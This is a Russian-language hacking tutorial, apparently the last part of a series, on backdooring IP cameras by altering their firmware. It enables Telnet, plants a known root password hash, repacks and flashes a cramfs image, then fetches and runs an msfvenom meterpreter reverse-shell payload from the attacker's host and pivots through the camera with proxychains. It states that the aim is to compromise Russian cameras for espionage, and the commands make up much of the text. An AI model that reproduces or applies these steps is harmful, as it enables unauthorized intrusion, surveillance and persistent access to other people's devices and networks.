Добро пожаловать обратно, кибервоины.
Надеюсь, вам пока нравится эта серия. Сегодня мы завершаем её заключительной частью, посвящённой модификации прошивки камеры. Это самый продвинутый и рискованный метод. Он требует времени и точности. Самая большая проблема — найти прошивку, подходящую для редактирования и компиляции без поломки устройства. Каждый производитель использует определённые форматы, поэтому, если вы нарушите структуру или файловую систему, камера не загрузится. Всегда действуйте осторожно.
Случай 4: Модификации
Этот случай похож на предыдущий, но мы копнём глубже. Представьте, что у найденной вами камеры нет открытых портов, таких как SSH или Telnet, и ни один из них не настраивается в настройках. На первый взгляд, это тупик.
Обзор… Файл не выбран. ХОРОШО
Но затем вы обнаруживаете, что он позволяет обновлять прошивку. У большинства камер эта функция доступна в веб-панели управления. Вот и всё. Первый шаг — получить копию прошивки. Её можно найти в архивах сторонних прошивок или на официальном сайте производителя.
После загрузки прошивки распакуйте её. Внутри мы обнаружили файл скрипта run.sh. Открыв его, мы заметили кое-что интересное.
В скрипте была закомментирована команда запуска Telnet. Мы удалили комментарий, чтобы включить Telnet.
Это решает одну часть проблемы. Но мы не знаем пароль Telnet, хешированный в файле passwd . По умолчанию этот файл находится в каталоге /etc :
Вместо того, чтобы взламывать существующий хеш пароля, мы генерируем свой собственный:
kali > openssl passwd -1 пароль
Это создаст новую строку хеша. Замените существующий хеш в файле /etc/passwd на только что сгенерированный. Сохраните изменения.
Теперь нужно перепаковать всю структуру каталогов в новый файл прошивки. Создайте новый каталог и переместите в него всё:
kali > mkdir firmware
kali > mv и т.д. прошивка/
И так далее, пока не переместите все остальные каталоги.
Наша прошивка использовала cramfs (сжатую файловую систему ROM). Вам потребуется установить инструменты cramfs непосредственно из репозитория Ubuntu, так как они недоступны для Kali.
Вот ссылка, по которой вы можете ее найти:
Давайте скачаем его:
Кали > wget http://ftp.ubuntu.com/ubuntu/ubuntu/pool/universe/c/cramfs/cramfsprogs_1.1-6ubuntu1_amd64.deb
Кали > sudo dpkg -i cramfsprogs_1.1-6ubuntu1_amd64.deb
После установки создайте новый образ прошивки: kali > mkcramfs firmware firmware-x.cramfs
Переименуйте файл, чтобы он соответствовал имени оригинальной прошивки, чтобы избежать проблем с загрузкой. Мы назвали его «firmware» для большей наглядности. Вернитесь на панель управления камерой и загрузите изменённую прошивку.
Обзор… прошивка-x.cramfs OK
Подождите несколько минут, пока он прошьётся и перезагрузится. Чтобы проверить, подключен ли он снова:
кали > пинг <камера_ip>
Как только камера ответит, подключитесь через Telnet:
кали > telnet <camera_ip> 23
Войдите в систему, используя root и созданный вами пароль. В случае успеха вы окажетесь внутри системы. В нашем случае на целевой машине уже был установлен nc , что очень помогло.
Выполнение полезной нагрузки
Определите архитектуру системы:цель > uname -m
Создайте полезную нагрузку на Kali:
kali > msfvenom -p linux/<arch>/meterpreter/reverse_tcp LHOST=<kali_ip> LPORT=<kali_port> -f elf > shell.elf
Разместите полезную нагрузку на вашем компьютере Kali:
kali > python3 -m http.server
Затем загрузите его на целевой объект:
цель > curl -O http://<kali_ip>:8000/shell.elf
цель > chmod +x shell.elf
цель > ./shell.elf
Откройте Metasploit на Kali, настройте multi/handler с теми же параметрами полезной нагрузки, и вы получите сеанс Meterpreter. После этого используйте proxychains с SOCKS-прокси для маршрутизации трафика через скомпрометированную камеру и доступа к сети за ней. Все эти шаги были рассмотрены в предыдущих частях.
Модификация прошивки камеры — самый продвинутый шаг в получении постоянного доступа. Это позволяет создать собственный бэкдор, даже если все порты закрыты. Этот метод даёт полный контроль, но и сопряжен с высоким риском. Небольшая ошибка — и камера сломается. Но если всё сделано правильно, это мощный инструмент для более глубокого проникновения. С этим заключительным этапом у вас теперь есть полное руководство по взлому, доступу к российским камерам и их использованию в качестве доверенных лиц в шпионских операциях. Удачи в вашей следующей охоте.